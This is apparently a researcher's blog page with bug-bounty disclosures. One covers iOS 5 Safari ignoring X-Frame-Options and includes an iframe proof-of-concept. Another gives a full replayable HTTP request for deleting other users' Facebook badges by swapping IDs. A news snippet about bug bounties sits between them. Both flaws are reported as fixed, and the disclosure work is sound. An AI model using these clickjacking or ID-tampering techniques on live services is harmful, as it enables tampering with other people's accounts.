Pages

Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

Monday, February 11, 2013

X-Framing them all! - Cross-Framing is "impossibe" - Apple’s iOS 5

Cross Framing Google, Facebook and whoever you wish. 


Jailbreak Your Device? or buy android?

This post is mostly for people who hold iPhone/iPad/iPod or any other iDevice.

As for today at least for most people, jailbreaking is a serious concern and as for my experience it can even determine whether or not to purchase IOS(Apple) or Android(Google) device.
 there are quite many differences that comes to mind, one bold example is that the exact same application (whatsapp for example) would be free if you hold an smart-device who runs android, and would cost money if you use iDevice unless it is jailbreaked.
Some people even say the reason there was no jailbreak for iPhone5 might affected the apple sales, New York Times post on “Apple Earnings”
“Once-euphoric investors, who pushed Apple’s stock to a record high of $702.10 last September, have become nervous, and in early trading on Thursday, the stock traded at $455.89, down more than 34 percent from its peak.” (http://www.nytimes.com/2013/01/24/technology/apple-earnings.html)


Are you, behind? IOS 5.1.1? 6.0.1?

Since the only reason to convince us to upgrade to IOS 6 are update you already have with your installed Cydia tweaks, people just “stay behind” and use IOS 5.1.1 or lower to still have a nice jailbreaked iPhone. 

So you use IOS 5 or lower? Are you Safe?
As for today we already know there are many web application vulnerabilities around, client side attacks and mostly cross site scripting have become one of the most common attacks in the past recent years.

Google, Facebook, Microsoft, Paypal, Mozilla, Apple and many other great companies have tried to fight against the security risks to give us - their product customers, the answer to keep our data safe.
But do they?
Many of the web application developers had to deal with many different client side attacks and design their security architecture to protect their users and avoid different hacking attempts targeting their customers, since some attacks such as frame-busting click-jacking, multiple stage attack, self-XSS exploitation etc, are not easy to deal with and require browser cooperation.
There are quite a few client side security solutions such as Anti-XSS filters; No-Script, XSS-Auditor, SoP different headers, Caching, and X-Frame-Options header which define how the interpreter handles a response from a webpage loaded insde frames.


Safari on your iPhone(or iDevice) – you CHOOSE to stay vulnerable:

So Google’s/Facebook’s/Paypal’s/Any_Other web developers(including myself) can rely on browser implemented security features and protect their webpages from Client side attacks mostly from Click-Jacking and staging attacks with X-Frame-Options, setting it so that the webpage content will only be displayed after a request coming from the Same-Origin or completely disable Framing and thinking everything is now secured, what we unfortunately forget it is basing the protection on browser's client security. 

 What if the browser fail?
I reported to apple 2 months ago at 06/12/12, that I discovered that even though the web server (in this example “www.google.com”) set HTTP response header, X-Frame-Options Header to Same Origin the response will still be displayed using my iDevice.

As you can see in the following PoC HTTP response while sending HTTP request to Google.com:

HTTP/1.1 200 OK
Date: Thu, 06 Dec 2012 15:54:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Length: 99283 


Setting this header suppose to provide browser client side security that will allow the iframe element to be displayed only if the parent document is at the same origin/domain of the iframe src attribute.
It appears the Safari Browser does not enforce X-Frame-Options and therefore displays our frame element as it did not even have any protection.


Normal Behavior IE9 enforcing X-Frame-Options: 




 Safari on IOS 5:


PoC Test Page:
<html>
<head><title>X-Frame-Options Bypass</title></head>
<h1>Apple PoC X-Frame-Options </h1>
<iframe id="X" src="http://www.google.com"></iframe>
<script>
framex = document.getElementById("X");
framex.onload = function () { }

</script>
</html>

Btw, This also means ClickJacking Anywhere Over IOS 5 and lower victims.

 So What Should I Do?

 Well, Apple did good and fixed this issue in the New IOS (6.0.1)
Unless you want to stay vulnerable knowning you can be a victim to advanced client side attacks over your gmail/facebook make sure you use IOS 6.
Posted by [Ben Hayak] at 2:37 AM 3 comments
Labels: , , , ,

Sunday, August 26, 2012

White-hat cyberbug bounty nets cash - NYPOST

White-hat cyberbug bounty nets cash

By SARA ASHLEY O’BRIEN

Come on, White Hats: Hack into our system, find a bug — and make it an interesting one! This seems to be the resounding message that major online businesses are spreading.
With US spending on cybercrime security estimated to exceed $23 billion this year, according to the research company Gartner, online businesses are onto the fact that cybercrime is a very real threat.`


`Businesses like Facebook, Google, Mozilla, Adobe, Microsoft and, as of June, PayPal, have developed “Bug Bounty” programs to recruit savvy security researchers like Hayak to help fight the good fight against cybercrime.

These Are snippets from a great story I got to be part of advertised in the NYPOST

Read more:
http://www.nypost.com/p/news/business/white_hat_cyberbug_bounty_nets_cash


Great Write 
I appreciate the story very much, Thank you NYPOST
Posted by [Ben Hayak] at 9:04 PM 3 comments
Labels: , , , , , , ,

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest engine of advertising, many companies use Facebook to promote their products and even hire people to deal just with that.


I found an attack vector that can be used by any hacker to delete badges/ads from people's/companies's accounts which will cause a damage to every blog/other website
because a new bages will have a new "bid" so every website will drop the old badge.

This issue effects the Badges feature 
As for: 
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the badges feature to share on blogger or any other place
an attacker see the bage in some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the Picture's name:
The first number 1403380007 is the Victim's facebook owner ID
(it's easy to get this id using a simple search in facebook)
Now the middle number: 3098 is the bid(badge id) 

Now what the Attacker needs is to capture a deleting badge packet
and manipulate the "bid" and "owner_id"

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 ....
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

Then a successful badge delete will be performed on the victim's account


The Facebook Team Fixed this issue and thanked me by adding my name into the Facebook WhiteHats thank you list : Facebook Security WhiteHats

Best Regards,
Ben Hayak 
Posted by [Ben Hayak] at 2:13 PM 3 comments
Labels: , ,
Subscribe to: Posts (Atom)